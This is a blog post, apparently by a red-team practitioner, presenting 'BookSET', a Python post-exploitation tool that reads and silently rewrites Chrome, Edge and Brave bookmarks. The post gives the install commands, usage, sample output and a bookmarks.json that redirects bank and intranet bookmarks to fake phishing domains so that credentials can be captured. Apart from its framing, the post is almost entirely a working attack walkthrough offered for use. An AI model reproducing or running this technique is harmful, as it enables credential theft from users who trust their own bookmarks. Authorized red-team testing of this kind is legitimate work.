BookSET - a simple Post-Exploitation Tool
It’s been a while since I dared to create something, and this time I bring you a tool that I think can add an interesting result to all the tests that we conduct as a red team for different companies.
During red team exercises, even after achieving access to a certain level, there are times when we need to go a step further, such as obtaining user access credentials. This is why I have created this tool.
BookSET is intended to modify bookmarks primarily for Google Chrome, but tests were also conducted on Edge and Brave browsers. Please note that this script can be used to capture credentials through phishing sites or redirect the victim to your EvilServer.
¿How it works? :
Let’s clone the repository and install some libraries:
git clone https://github.com/edwardosorio/BookSET.git
cd BookSET
pip install -r requirements.txt
that’s it :D !!
[+] Help ! :
if you need to know the parameters from the script, pls type:
python bookSET.py -h
____ _ ____ _____ _____
| __ ) ___ ___ | | __/ ___|| ____|_ _|
| _ \ / _ \ / _ \| |/ /\___ \| _| | |
| |_) | (_) | (_) | < ___) | |___ | |
|____/ \___/ \___/|_|\_\|____/|_____| |_|
[ just a simple post-exploitation tool :) by _mrpack ]
usage: bookSET.py [-h] [-recon] [-replace]
Get and Replace all Urls from Google Chrome BookMarks
optional arguments:
-h, --help show this help message and exit
-recon Get all URLs Bookmarks
-replace Replace URLs Bookmarks
[+] Recon Mode :
If you want to know what BookMarks the target has, then we just need to execute the following command line:
python bookSET.py -recon
and the output should be something like this:
____ _ ____ _____ _____
| __ ) ___ ___ | | __/ ___|| ____|_ _|
| _ \ / _ \ / _ \| |/ /\___ \| _| | |
| |_) | (_) | (_) | < ___) | |___ | |
|____/ \___/ \___/|_|\_\|____/|_____| |_|
[ just a simple post-exploitation tool :) by _mrpack ]
[+] Getting Urls from BookMarks:
- https://www.facebook.com
- https://www.bank.com
- https://www.twitter.com
- https://www.instagram.com
- https://intranet.companie.org
[+] Total of BookMarks identified : [5]
[+] bookmarks.json file content :
Now that we know all the BookMarks that the target has, we can check all the URLs and just make a few “fake websites” for some URLs that we want…
Once we make the phishing sites, we can configure our “bookmarks.json” file, the content of “bookmarks.json” it’s easy to understand, and the “current_url” it’s the URL that we want to change and replace it with “new_url”:
{
"bookmark_bar": [
{
"current_url": "https://www.bank.com/",
"new_url": "https://www.fakebank.com/"
},
{
"current_url": "https://intranet.companie.org/",
"new_url": "https://intranet.fakecompanie.org/"
}
]
}
[+] Replace Mode :
Now that we configured the bookmarks.json file we can execute again our script with -replace parameter:
python bookSET.py -replace
and the output should be something like this:
____ _ ____ _____ _____
| __ ) ___ ___ | | __/ ___|| ____|_ _|
| _ \ / _ \ / _ \| |/ /\___ \| _| | |
| |_) | (_) | (_) | < ___) | |___ | |
|____/ \___/ \___/|_|\_\|____/|_____| |_|
[ just a simple post-exploitation tool :) by _mrpack ]
[+] URLs modified:
[-] https://www.fakebank.com/
[-] https://intranet.fakecompanie.org/
[+] Total of BookMarks replaced : [2]
Chrome it's running !!
[+] Chrome was Closed !
...
...
...
...
[+] Opening Chrome !
[+] Done !!
once the script finished we can check all the changes.
NOTE: This script was tested for the following Web Browsers:
- Google Chrome
- Edge
- Brave
And tested for the following O.S:
- windows
- linux
- mac
You just need to change the Browser Path
Conclusions :
- There are a lot of ways to follow and to exploit to get better results.
- Users don’t check the URLs from bookmarks because they make that bookmark, then they trust when they click it … please don’t use this for bad purposes.